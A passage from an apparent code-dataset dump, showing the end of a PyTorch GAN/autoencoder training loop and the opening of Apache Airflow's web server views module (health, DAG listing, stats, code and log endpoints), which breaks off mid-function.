args.images_per_stage\n\n if refresh_dataset:\n train_dataset = data.Utils.sample_data2(train_data_loader, batch_size(reso), reso, session)\n refresh_dataset = False\n print(\"Refreshed dataset. Alpha={} and iteration={}\".format(session.alpha, sample_i_current_stage))\n if refresh_imagePool:\n imagePoolSize = 200 if reso < 256 else 100\n generatedImagePool = utils.ImagePool(imagePoolSize) #Reset the pool to avoid images of 2 different resolutions in the pool\n refresh_imagePool = False\n print('Image pool created with size {} because reso is {}'.format(imagePoolSize, reso))\n\n ####################### Training init ####################### \n\n z = Variable( torch.FloatTensor(batch_size(reso), args.nz, 1, 1) ).cuda(non_blocking=(args.gpu_count>1))\n KL_minimizer = KLN01Loss(direction=args.KL, minimize=True)\n KL_maximizer = KLN01Loss(direction=args.KL, minimize=False)\n \n stats = {}\n\n one = torch.FloatTensor([1]).cuda(non_blocking=(args.gpu_count>1))\n\n try:\n real_image, _ = next(train_dataset) \n except (OSError, StopIteration):\n train_dataset = data.Utils.sample_data2(train_data_loader, batch_size(reso), reso, session)\n real_image, _ = next(train_dataset)\n\n ####################### DISCRIMINATOR / ENCODER ###########################\n\n utils.switch_grad_updates_to_first_of(encoder, generator)\n encoder.zero_grad()\n\n x = Variable(real_image).cuda(non_blocking=(args.gpu_count>1))\n kls = \"\"\n if train_mode == config.MODE_GAN:\n \n # Discriminator for real samples\n real_predict, _ = encoder(x, session.phase, session.alpha, args.use_ALQ)\n real_predict = real_predict.mean() \\\n - 0.001 * (real_predict ** 2).mean()\n real_predict.backward(-one) # Towards 1\n\n # (1) Generator => D. Identical to (2) see below\n \n fake_predict, fake_image = D_prediction_of_G_output(generator, encoder, session.phase, session.alpha)\n fake_predict.backward(one)\n\n # Grad penalty\n\n grad_penalty = get_grad_penalty(encoder, x, fake_image, session.phase, session.alpha)\n grad_penalty.backward()\n\n elif train_mode == config.MODE_CYCLIC:\n e_losses = []\n\n # e(X)\n \n real_z = encoder(x, session.phase, session.alpha, args.use_ALQ)\n if args.use_real_x_KL:\n # KL_real: - \\Delta( e(X) , Z ) -> max_e\n KL_real = KL_minimizer(real_z) * args.real_x_KL_scale\n e_losses.append(KL_real)\n\n stats['real_mean'] = KL_minimizer.samples_mean.data.mean()\n stats['real_var'] = KL_minimizer.samples_var.data.mean()\n stats['KL_real'] = KL_real.data.item()\n kls = \"{0:.3f}\".format(stats['KL_real'])\n\n # The final entries are the label. Normal case, just 1. Extract it/them, and make it [b x 1]:\n\n real_z, label = utils.split_labels_out_of_latent(real_z)\n recon_x = generator(real_z, label, session.phase, session.alpha)\n if args.use_loss_x_reco:\n # match_x: E_x||g(e(x)) - x|| -> min_e\n err = utils.mismatch(recon_x, x, args.match_x_metric) * match_x\n e_losses.append(err)\n stats['x_reconstruction_error'] = err.item()\n\n args.use_wpgan_grad_penalty = False\n grad_penalty = 0.0\n \n if args.use_loss_fake_D_KL:\n # TODO: The following codeblock is essentially the same as the KL_minimizer part on G side. Unify\n utils.populate_z(z, args.nz+args.n_label, args.noise, batch_size(reso))\n z = torch.squeeze(z)\n z, label = utils.split_labels_out_of_latent(z)\n fake = generator(z, label, session.phase, session.alpha).detach()\n\n if session.alpha >= 1.0:\n fake = generatedImagePool.query(fake.data)\n\n # e(g(Z))\n egz = encoder(fake, session.phase, session.alpha, args.use_ALQ)\n\n # KL_fake: \\Delta( e(g(Z)) , Z ) -> max_e\n KL_fake = KL_maximizer(egz) * args.fake_D_KL_scale\n e_losses.append(KL_fake)\n\n stats['fake_mean'] = KL_maximizer.samples_mean.data.mean()\n stats['fake_var'] = KL_maximizer.samples_var.data.mean()\n stats['KL_fake'] = -KL_fake.item()\n kls = \"{0}/{1:.3f}\".format(kls, stats['KL_fake'])\n\n if args.use_wpgan_grad_penalty:\n grad_penalty = get_grad_penalty(encoder, x, fake, session.phase, session.alpha)\n \n # Update e\n if len(e_losses) > 0:\n e_loss = sum(e_losses) \n stats['E_loss'] = np.float32(e_loss.cpu().detach().numpy())\n e_loss.backward()\n\n if args.use_wpgan_grad_penalty:\n grad_penalty.backward()\n stats['Grad_penalty'] = grad_penalty.data\n\n #book-keeping\n disc_loss_val = e_loss.item()\n\n session.optimizerD.step()\n\n torch.cuda.empty_cache()\n\n ######################## GENERATOR / DECODER #############################\n \n if (batch_count + 1) % args.n_critic == 0:\n utils.switch_grad_updates_to_first_of(generator, encoder)\n\n for _ in range(args.n_generator):\n generator.zero_grad()\n g_losses = []\n \n if train_mode == config.MODE_GAN:\n fake_predict, _ = D_prediction_of_G_output(generator, encoder, session.phase, session.alpha)\n loss = -fake_predict\n g_losses.append(loss)\n \n elif train_mode == config.MODE_CYCLIC: #TODO We push the z variable around here like idiots\n def KL_of_encoded_G_output(generator, z):\n utils.populate_z(z, args.nz+args.n_label, args.noise, batch_size(reso))\n z, label = utils.split_labels_out_of_latent(z) \n fake = generator(z, label, session.phase, session.alpha)\n \n egz = encoder(fake, session.phase, session.alpha, args.use_ALQ)\n # KL_fake: \\Delta( e(g(Z)) , Z ) -> min_g\n return egz, label, KL_minimizer(egz) * args.fake_G_KL_scale, z\n\n egz, label, kl, z = KL_of_encoded_G_output(generator, z)\n\n if args.use_loss_KL_z:\n g_losses.append(kl) # G minimizes this KL\n stats['KL(Phi(G))'] = kl.item()\n kls = \"{0}/{1:.3f}\".format(kls, stats['KL(Phi(G))'])\n\n if args.use_loss_z_reco:\n z = torch.cat((z, label), 1)\n z_diff = utils.mismatch(egz, z, args.match_z_metric) * args.match_z # G tries to make the original z and encoded z match\n g_losses.append(z_diff) \n\n if len(g_losses) > 0:\n loss = sum(g_losses)\n stats['G_loss'] = np.float32(loss.cpu().detach().numpy())\n loss.backward()\n\n # Book-keeping only:\n gen_loss_val = loss.item()\n \n session.optimizerG.step()\n\n torch.cuda.empty_cache()\n\n if train_mode == config.MODE_CYCLIC:\n if args.use_loss_z_reco:\n stats['z_reconstruction_error'] = z_diff.item()\n\n accumulate(g_running, generator)\n\n del z, x, one, real_image, real_z, KL_real, label, recon_x, fake, egz, KL_fake, kl, z_diff\n\n if train_mode == config.MODE_CYCLIC:\n if args.use_TB:\n for key,val in stats.items(): \n writer.add_scalar(key, val, session.sample_i)\n elif batch_count % 100 == 0:\n print(stats)\n\n if args.use_TB:\n writer.add_scalar('LOD', session.phase + session.alpha, session.sample_i)\n\n ######################## Statistics ######################## \n\n b = batch_size_by_phase(session.phase)\n zr, xr = (stats['z_reconstruction_error'], stats['x_reconstruction_error']) if train_mode == config.MODE_CYCLIC else (0.0, 0.0)\n e = (session.sample_i / float(epoch_len))\n pbar.set_description(\n ('{0}; it: {1}; phase: {2}; b: {3:.1f}; Alpha: {4:.3f}; Reso: {5}; E: {6:.2f}; KL(real/fake/fakeG): {7}; z-reco: {8:.2f}; x-reco {9:.3f}; real_var {10:.4f}').format(batch_count+1, session.sample_i+1, session.phase, b, session.alpha, reso, e, kls, zr, xr, stats['real_var'])\n )\n #(f'{i + 1}; it: {iteration+1}; b: {b:.1f}; G: {gen_loss_val:.5f}; D: {disc_loss_val:.5f};'\n # f' Grad: {grad_loss_val:.5f}; Alpha: {alpha:.3f}; Reso: {reso}; S-mean: {real_mean:.3f}; KL(real/fake/fakeG): {kls}; z-reco: {zr:.2f}'))\n\n pbar.update(batch_size(reso))\n session.sample_i += batch_size(reso) # if not benchmarking else 100\n batch_count += 1\n\n ######################## Saving ######################## \n\n if batch_count % args.checkpoint_cycle == 0:\n for postfix in {'latest', str(session.sample_i).zfill(6)}:\n session.save_all('{}/{}_state'.format(args.checkpoint_dir, postfix))\n\n print(\"Checkpointed to {}\".format(session.sample_i))\n\n ######################## Tests ######################## \n\n try:\n evaluate.tests_run(g_running, encoder, test_data_loader, session, writer,\n reconstruction = (batch_count % 800 == 0),\n interpolation = (batch_count % 800 == 0),\n collated_sampling = (batch_count % 800 == 0),\n individual_sampling = (batch_count % (args.images_per_stage/batch_size(reso)/4) == 0)\n )\n except (OSError, StopIteration):\n print(\"Skipped periodic tests due to an exception.\")\n\n pbar.close()\n\ndef main():\n setup()\n session = Session()\n session.create()\n\n print('PyTorch {}'.format(torch.__version__))\n\n if args.train_path:\n train_data_loader = data.get_loader(args.data, args.train_path)\n else:\n train_data_loader = None\n \n if args.test_path:\n test_data_loader = data.get_loader(args.data, args.test_path)\n elif args.aux_inpath:\n test_data_loader = data.get_loader(args.data, args.aux_inpath)\n else:\n test_data_loader = None\n\n # 4 modes: Train (with data/train), test (with data/test), aux-test (with custom aux_inpath), dump-training-set\n \n if args.run_mode == config.RUN_TRAIN:\n train(session.generator, session.encoder, session.g_running, train_data_loader, test_data_loader,\n session = session,\n total_steps = args.total_kimg * 1000,\n train_mode = args.train_mode)\n elif args.run_mode == config.RUN_TEST:\n if args.reconstructions_N > 0 or args.interpolate_N > 0:\n evaluate.Utils.reconstruction_dryrun(session.generator, session.encoder, test_data_loader, session=session)\n evaluate.tests_run(session.generator, session.encoder, test_data_loader, session=session, writer=writer)\n elif args.run_mode == config.RUN_DUMP:\n session.phase = args.start_phase\n data.dump_training_set(train_data_loader, args.dump_trainingset_N, args.dump_trainingset_dir, session)\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2ec6d541179c18d0ecd204d4a93792951a8923", "content": "#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport copy\nimport itertools\nimport json\nimport logging\nimport math\nimport os\nimport pkgutil\nimport socket\nimport traceback\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom typing import Dict, List, Optional, Tuple\nfrom urllib.parse import quote, unquote\n\nimport lazy_object_proxy\nimport markdown\nimport sqlalchemy as sqla\nfrom flask import (\n Markup, Response, escape, flash, jsonify, make_response, redirect, render_template, request,\n session as flask_session, url_for,\n)\nfrom flask_appbuilder import BaseView, ModelView, expose, has_access, permission_name\nfrom flask_appbuilder.actions import action\nfrom flask_appbuilder.models.sqla.filters import BaseFilter\nfrom flask_babel import lazy_gettext\nfrom jinja2.utils import htmlsafe_json_dumps # type: ignore\nfrom pygments import highlight, lexers\nfrom pygments.formatters import HtmlFormatter\nfrom sqlalchemy import and_, desc, func, or_, union_all\nfrom sqlalchemy.orm import joinedload\nfrom wtforms import SelectField, validators\n\nimport airflow\nfrom airflow import models, settings\nfrom airflow._vendor import nvd3\nfrom airflow.api.common.experimental.mark_tasks import (\n set_dag_run_state_to_failed, set_dag_run_state_to_success,\n)\nfrom airflow.configuration import AIRFLOW_CONFIG, conf\nfrom airflow.exceptions import AirflowException\nfrom airflow.executors.executor_loader import ExecutorLoader\nfrom airflow.jobs.base_job import BaseJob\nfrom airflow.jobs.scheduler_job import SchedulerJob\nfrom airflow.models import Connection, DagModel, DagTag, Log, SlaMiss, TaskFail, XCom, errors\nfrom airflow.models.dagcode import DagCode\nfrom airflow.models.dagrun import DagRun, DagRunType\nfrom airflow.settings import STORE_SERIALIZED_DAGS\nfrom airflow.ti_deps.dep_context import DepContext\nfrom airflow.ti_deps.dependencies_deps import RUNNING_DEPS, SCHEDULER_QUEUED_DEPS\nfrom airflow.utils import timezone\nfrom airflow.utils.dates import infer_time_unit, scale_time_units\nfrom airflow.utils.helpers import alchemy_to_dict, render_log_filename\nfrom airflow.utils.session import create_session, provide_session\nfrom airflow.utils.state import State\nfrom airflow.www import utils as wwwutils\nfrom airflow.www.app import appbuilder\nfrom airflow.www.decorators import action_logging, gzipped, has_dag_access\nfrom airflow.www.forms import (\n ConnectionForm, DagRunForm, DateTimeForm, DateTimeWithNumRunsForm, DateTimeWithNumRunsWithDagRunsForm,\n)\nfrom airflow.www.widgets import AirflowModelListWidget\n\nPAGE_SIZE = conf.getint('webserver', 'page_size')\nFILTER_TAGS_COOKIE = 'tags_filter'\nFILTER_STATUS_COOKIE = 'dag_status_filter'\n\nif os.environ.get('SKIP_DAGS_PARSING') != 'True':\n dagbag = models.DagBag(settings.DAGS_FOLDER, store_serialized_dags=STORE_SERIALIZED_DAGS)\nelse:\n dagbag = models.DagBag(os.devnull, include_examples=False)\n\n\ndef get_date_time_num_runs_dag_runs_form_data(request, session, dag):\n dttm = request.args.get('execution_date')\n if dttm:\n dttm = timezone.parse(dttm)\n else:\n dttm = dag.get_latest_execution_date(session=session) or timezone.utcnow()\n\n base_date = request.args.get('base_date')\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n # The DateTimeField widget truncates milliseconds and would loose\n # the first dag run. Round to next second.\n base_date = (dttm + timedelta(seconds=1)).replace(microsecond=0)\n\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n DR = models.DagRun\n drs = (\n session.query(DR)\n .filter(\n DR.dag_id == dag.dag_id,\n DR.execution_date <= base_date)\n .order_by(desc(DR.execution_date))\n .limit(num_runs)\n .all()\n )\n dr_choices = []\n dr_state = None\n for dr in drs:\n dr_choices.append((dr.execution_date.isoformat(), dr.run_id))\n if dttm == dr.execution_date:\n dr_state = dr.state\n\n # Happens if base_date was changed and the selected dag run is not in result\n if not dr_state and drs:\n dr = drs[0]\n dttm = dr.execution_date\n dr_state = dr.state\n\n return {\n 'dttm': dttm,\n 'base_date': base_date,\n 'num_runs': num_runs,\n 'execution_date': dttm.isoformat(),\n 'dr_choices': dr_choices,\n 'dr_state': dr_state,\n }\n\n\n######################################################################################\n# Error handlers\n######################################################################################\n\ndef circles(error):\n return render_template(\n 'airflow/circles.html', hostname=socket.getfqdn() if conf.getboolean(\n 'webserver',\n 'EXPOSE_HOSTNAME',\n fallback=True) else 'redact'), 404\n\n\ndef show_traceback(error):\n from airflow.utils import asciiart as ascii_\n return render_template(\n 'airflow/traceback.html',\n hostname=socket.getfqdn() if conf.getboolean(\n 'webserver',\n 'EXPOSE_HOSTNAME',\n fallback=True) else 'redact',\n nukular=ascii_.nukular,\n info=traceback.format_exc() if conf.getboolean(\n 'webserver',\n 'EXPOSE_STACKTRACE',\n fallback=True) else 'Error! Please contact server admin'), 500\n\n######################################################################################\n# BaseViews\n######################################################################################\n\n\nclass AirflowBaseView(BaseView):\n from airflow import macros\n route_base = ''\n\n # Make our macros available to our UI templates too.\n extra_args = {\n 'macros': macros,\n }\n\n def render_template(self, *args, **kwargs):\n return super().render_template(\n *args,\n # Cache this at most once per request, not for the lifetime of the view instance\n scheduler_job=lazy_object_proxy.Proxy(SchedulerJob.most_recent_job),\n **kwargs\n )\n\n\nclass Airflow(AirflowBaseView):\n @expose('/health')\n def health(self):\n \"\"\"\n An endpoint helping check the health status of the Airflow instance,\n including metadatabase and scheduler.\n \"\"\"\n\n payload = {\n 'metadatabase': {'status': 'unhealthy'}\n }\n\n latest_scheduler_heartbeat = None\n scheduler_status = 'unhealthy'\n payload['metadatabase'] = {'status': 'healthy'}\n try:\n scheduler_job = SchedulerJob.most_recent_job()\n\n if scheduler_job:\n latest_scheduler_heartbeat = scheduler_job.latest_heartbeat.isoformat()\n if scheduler_job.is_alive():\n scheduler_status = 'healthy'\n except Exception:\n payload['metadatabase']['status'] = 'unhealthy'\n\n payload['scheduler'] = {'status': scheduler_status,\n 'latest_scheduler_heartbeat': latest_scheduler_heartbeat}\n\n return wwwutils.json_response(payload)\n\n @expose('/home')\n @has_access\n def index(self):\n hide_paused_dags_by_default = conf.getboolean('webserver',\n 'hide_paused_dags_by_default')\n\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n def get_int_arg(value, default=0):\n try:\n return int(value)\n except ValueError:\n return default\n\n arg_current_page = request.args.get('page', '0')\n arg_search_query = request.args.get('search', None)\n arg_tags_filter = request.args.getlist('tags', None)\n arg_status_filter = request.args.get('status', None)\n\n if request.args.get('reset_tags') is not None:\n flask_session[FILTER_TAGS_COOKIE] = None\n arg_tags_filter = None\n else:\n cookie_val = flask_session.get(FILTER_TAGS_COOKIE)\n if arg_tags_filter:\n flask_session[FILTER_TAGS_COOKIE] = ','.join(arg_tags_filter)\n elif cookie_val:\n arg_tags_filter = cookie_val.split(',')\n\n if arg_status_filter is None:\n cookie_val = flask_session.get(FILTER_STATUS_COOKIE)\n if cookie_val:\n arg_status_filter = cookie_val\n else:\n arg_status_filter = 'active' if hide_paused_dags_by_default else 'all'\n flask_session[FILTER_STATUS_COOKIE] = arg_status_filter\n else:\n status = arg_status_filter.strip().lower()\n flask_session[FILTER_STATUS_COOKIE] = status\n arg_status_filter = status\n\n dags_per_page = PAGE_SIZE\n current_page = get_int_arg(arg_current_page, default=0)\n\n start = current_page * dags_per_page\n end = start + dags_per_page\n\n # Get all the dag id the user could access\n filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n\n with create_session() as session:\n # read orm_dags from the db\n dags_query = session.query(DagModel).filter(\n ~DagModel.is_subdag, DagModel.is_active\n )\n\n if arg_search_query:\n dags_query = dags_query.filter(\n DagModel.dag_id.ilike('%' + arg_search_query + '%') |\n DagModel.owners.ilike('%' + arg_search_query + '%')\n )\n\n if arg_tags_filter:\n dags_query = dags_query.filter(DagModel.tags.any(DagTag.name.in_(arg_tags_filter)))\n\n if 'all_dags' not in filter_dag_ids:\n dags_query = dags_query.filter(DagModel.dag_id.in_(filter_dag_ids))\n\n all_dags = dags_query\n active_dags = dags_query.filter(~DagModel.is_paused)\n paused_dags = dags_query.filter(DagModel.is_paused)\n\n is_paused_count = dict(\n all_dags.with_entities(DagModel.is_paused, func.count(DagModel.dag_id))\n .group_by(DagModel.is_paused).all()\n )\n status_count_active = is_paused_count.get(False, 0)\n status_count_paused = is_paused_count.get(True, 0)\n all_dags_count = status_count_active + status_count_paused\n if arg_status_filter == 'active':\n current_dags = active_dags\n num_of_all_dags = status_count_active\n elif arg_status_filter == 'paused':\n current_dags = paused_dags\n num_of_all_dags = status_count_paused\n else:\n current_dags = all_dags\n num_of_all_dags = all_dags_count\n\n dags = current_dags.order_by(DagModel.dag_id).options(\n joinedload(DagModel.tags)).offset(start).limit(dags_per_page).all()\n\n dagtags = session.query(DagTag.name).distinct(DagTag.name).all()\n tags = [\n {\"name\": name, \"selected\": bool(arg_tags_filter and name in arg_tags_filter)}\n for name, in dagtags\n ]\n\n import_errors = session.query(errors.ImportError).all()\n\n for ie in import_errors:\n flash(\n \"Broken DAG: [{ie.filename}] {ie.stacktrace}\".format(ie=ie),\n \"dag_import_error\")\n\n from airflow.plugins_manager import import_errors as plugin_import_errors\n for filename, stacktrace in plugin_import_errors.items():\n flash(\n \"Broken plugin: [{filename}] {stacktrace}\".format(\n stacktrace=stacktrace,\n filename=filename),\n \"error\")\n\n num_of_pages = int(math.ceil(num_of_all_dags / float(dags_per_page)))\n\n state_color_mapping = State.state_color.copy()\n state_color_mapping[\"null\"] = state_color_mapping.pop(None)\n\n return self.render_template(\n 'airflow/dags.html',\n dags=dags,\n current_page=current_page,\n search_query=arg_search_query if arg_search_query else '',\n page_size=dags_per_page,\n num_of_pages=num_of_pages,\n num_dag_from=min(start + 1, num_of_all_dags),\n num_dag_to=min(end, num_of_all_dags),\n num_of_all_dags=num_of_all_dags,\n paging=wwwutils.generate_pages(current_page,\n num_of_pages,\n search=escape(arg_search_query) if arg_search_query else None,\n status=arg_status_filter if arg_status_filter else None),\n num_runs=num_runs,\n tags=tags,\n state_color=state_color_mapping,\n status_filter=arg_status_filter,\n status_count_all=all_dags_count,\n status_count_active=status_count_active,\n status_count_paused=status_count_paused)\n\n @expose('/dag_stats', methods=['POST'])\n @has_access\n @provide_session\n def dag_stats(self, session=None):\n dr = models.DagRun\n\n allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]\n\n dag_state_stats = session.query(dr.dag_id, dr.state, sqla.func.count(dr.state))\\\n .group_by(dr.dag_id, dr.state)\n\n # Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n if not filter_dag_ids:\n return wwwutils.json_response({})\n\n payload = {}\n dag_state_stats = dag_state_stats.filter(dr.dag_id.in_(filter_dag_ids))\n data = {}\n\n for dag_id, state, count in dag_state_stats:\n if dag_id not in data:\n data[dag_id] = {}\n data[dag_id][state] = count\n\n for dag_id in filter_dag_ids:\n payload[dag_id] = []\n for state in State.dag_states:\n count = data.get(dag_id, {}).get(state, 0)\n payload[dag_id].append({\n 'state': state,\n 'count': count\n })\n\n return wwwutils.json_response(payload)\n\n @expose('/task_stats', methods=['POST'])\n @has_access\n @provide_session\n def task_stats(self, session=None):\n TI = models.TaskInstance\n DagRun = models.DagRun\n Dag = models.DagModel\n\n allowed_dag_ids = set(appbuilder.sm.get_accessible_dag_ids())\n\n if not allowed_dag_ids:\n return wwwutils.json_response({})\n\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = {dag_id for dag_id, in session.query(models.DagModel.dag_id)}\n\n # Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n RunningDagRun = (\n session.query(DagRun.dag_id, DagRun.execution_date)\n .join(Dag, Dag.dag_id == DagRun.dag_id)\n .filter(DagRun.state == State.RUNNING, Dag.is_active)\n )\n\n if selected_dag_ids:\n RunningDagRun = RunningDagRun.filter(DagRun.dag_id.in_(filter_dag_ids))\n RunningDagRun = RunningDagRun.subquery('running_dag_run')\n\n # Select all task_instances from active dag_runs.\n RunningTI = (\n session.query(TI.dag_id.label('dag_id'), TI.state.label('state'))\n .join(RunningDagRun,\n and_(RunningDagRun.c.dag_id == TI.dag_id,\n RunningDagRun.c.execution_date == TI.execution_date))\n )\n if selected_dag_ids:\n RunningTI = RunningTI.filter(TI.dag_id.in_(filter_dag_ids))\n\n if conf.getboolean('webserver', 'SHOW_RECENT_STATS_FOR_COMPLETED_RUNS', fallback=True):\n LastDagRun = (\n session.query(\n DagRun.dag_id,\n sqla.func.max(DagRun.execution_date).label('execution_date')\n )\n .join(Dag, Dag.dag_id == DagRun.dag_id)\n .filter(DagRun.state != State.RUNNING, Dag.is_active)\n .group_by(DagRun.dag_id)\n )\n\n if selected_dag_ids:\n LastDagRun = LastDagRun.filter(DagRun.dag_id.in_(filter_dag_ids))\n LastDagRun = LastDagRun.subquery('last_dag_run')\n\n # Select all task_instances from active dag_runs.\n # If no dag_run is active, return task instances from most recent dag_run.\n LastTI = (\n session.query(TI.dag_id.label('dag_id'), TI.state.label('state'))\n .join(LastDagRun,\n and_(LastDagRun.c.dag_id == TI.dag_id,\n LastDagRun.c.execution_date == TI.execution_date))\n )\n if selected_dag_ids:\n LastTI = LastTI.filter(TI.dag_id.in_(filter_dag_ids))\n\n FinalTI = union_all(LastTI, RunningTI).alias('final_ti')\n else:\n FinalTI = RunningTI.subquery('final_ti')\n\n qry = (\n session.query(FinalTI.c.dag_id, FinalTI.c.state, sqla.func.count())\n .group_by(FinalTI.c.dag_id, FinalTI.c.state)\n )\n\n data = {}\n for dag_id, state, count in qry:\n if dag_id not in data:\n data[dag_id] = {}\n data[dag_id][state] = count\n\n payload = {}\n for dag_id in filter_dag_ids:\n payload[dag_id] = []\n for state in State.task_states:\n count = data.get(dag_id, {}).get(state, 0)\n payload[dag_id].append({\n 'state': state,\n 'count': count\n })\n return wwwutils.json_response(payload)\n\n @expose('/last_dagruns', methods=['POST'])\n @has_access\n @provide_session\n def last_dagruns(self, session=None):\n DagRun = models.DagRun\n\n allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]\n\n # Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n if not filter_dag_ids:\n return wwwutils.json_response({})\n\n query = session.query(\n DagRun.dag_id, sqla.func.max(DagRun.execution_date).label('last_run')\n ).group_by(DagRun.dag_id)\n\n # Filter to only ask for accessible and selected dags\n query = query.filter(DagRun.dag_id.in_(filter_dag_ids))\n\n resp = {\n r.dag_id.replace('.', '__dot__'): {\n 'dag_id': r.dag_id,\n 'last_run': r.last_run.isoformat(),\n } for r in query\n }\n return wwwutils.json_response(resp)\n\n @expose('/code')\n @has_dag_access(can_dag_read=True)\n @has_access\n @provide_session\n def code(self, session=None):\n all_errors = \"\"\n\n try:\n dag_id = request.args.get('dag_id')\n dag_orm = DagModel.get_dagmodel(dag_id, session=session)\n code = DagCode.get_code_by_fileloc(dag_orm.fileloc)\n html_code = highlight(\n code, lexers.PythonLexer(), HtmlFormatter(linenos=True))\n\n except Exception as e:\n all_errors += (\n \"Exception encountered during \" +\n \"dag_id retrieval/dag retrieval fallback/code highlighting:\\n\\n{}\\n\".format(e)\n )\n html_code = '

    Failed to load file.

    Details: {}

    '.format(\n escape(all_errors))\n\n return self.render_template(\n 'airflow/dag_code.html', html_code=html_code, dag=dag_orm, title=dag_id,\n root=request.args.get('root'),\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n wrapped=conf.getboolean('webserver', 'default_wrap'))\n\n @expose('/dag_details')\n @has_dag_access(can_dag_read=True)\n @has_access\n @provide_session\n def dag_details(self, session=None):\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n title = \"DAG details\"\n root = request.args.get('root', '')\n\n TI = models.TaskInstance\n states = (\n session.query(TI.state, sqla.func.count(TI.dag_id))\n .filter(TI.dag_id == dag_id)\n .group_by(TI.state)\n .all()\n )\n\n active_runs = models.DagRun.find(\n dag_id=dag_id,\n state=State.RUNNING,\n external_trigger=False\n )\n\n return self.render_template(\n 'airflow/dag_details.html',\n dag=dag, title=title, root=root, states=states, State=State, active_runs=active_runs)\n\n @expose('/rendered')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def rendered(self):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n root = request.args.get('root', '')\n\n logging.info(\"Retrieving rendered templates.\")\n dag = dagbag.get_dag(dag_id)\n\n task = copy.copy(dag.get_task(task_id))\n ti = models.TaskInstance(task=task, execution_date=dttm)\n try:\n ti.get_rendered_template_fields()\n except AirflowException as e:\n msg = \"Error rendering template: \" + escape(e)\n if e.__cause__:\n msg += Markup(\"

    OriginalError: \") + escape(e.__cause__)\n flash(msg, \"error\")\n except Exception as e:\n flash(\"Error rendering template: \" + str(e), \"error\")\n title = \"Rendered Template\"\n html_dict = {}\n for template_field in task.template_fields:\n content = getattr(task, template_field)\n if template_field in wwwutils.get_attr_renderer():\n html_dict[template_field] = \\\n wwwutils.get_attr_renderer()[template_field](content)\n else:\n html_dict[template_field] = (\n \"
    \" + str(content) + \"
    \")\n\n return self.render_template(\n 'airflow/ti_code.html',\n html_dict=html_dict,\n dag=dag,\n task_id=task_id,\n execution_date=execution_date,\n form=form,\n root=root,\n title=title)\n\n @expose('/get_logs_with_metadata')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def get_logs_with_metadata(self, session=None):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n if request.args.get('try_number') is not None:\n try_number = int(request.args.get('try_number'))\n else:\n try_number = None\n metadata = request.args.get('metadata')\n metadata = json.loads(metadata)\n response_format = request.args.get('format', 'json')\n\n # metadata may be null\n if not metadata:\n metadata = {}\n\n # Convert string datetime into actual datetime\n try:\n execution_date = timezone.parse(execution_date)\n except ValueError:\n error_message = (\n 'Given execution date, {}, could not be identified '\n 'as a date. Example date format: 2015-11-16T14:34:15+00:00'.format(\n execution_date))\n response = jsonify({'error': error_message})\n response.status_code = 400\n\n return response\n\n logger = logging.getLogger('airflow.task')\n task_log_reader = conf.get('logging', 'task_log_reader')\n handler = next((handler for handler in logger.handlers\n if handler.name == task_log_reader), None)\n\n ti = session.query(models.TaskInstance).filter(\n models.TaskInstance.dag_id == dag_id,\n models.TaskInstance.task_id == task_id,\n models.TaskInstance.execution_date == dttm).first()\n\n def _get_logs_with_metadata(try_number, metadata):\n if ti is None:\n logs = [\"*** Task instance did not exist in the DB\\n\"]\n metadata['end_of_log'] = True\n else:\n logs, metadatas = handler.read(ti, try_number, metadata=metadata)\n metadata = metadatas[0]\n return logs, metadata\n\n try:\n if ti is not None:\n dag = dagbag.get_dag(dag_id)\n if dag:\n ti.task = dag.get_task(ti.task_id)\n if response_format == 'json':\n logs, metadata = _get_logs_with_metadata(try_number, metadata)\n message = logs[0] if try_number is not None else logs\n return jsonify(message=message, metadata=metadata)\n\n filename_template = conf.get('logging', 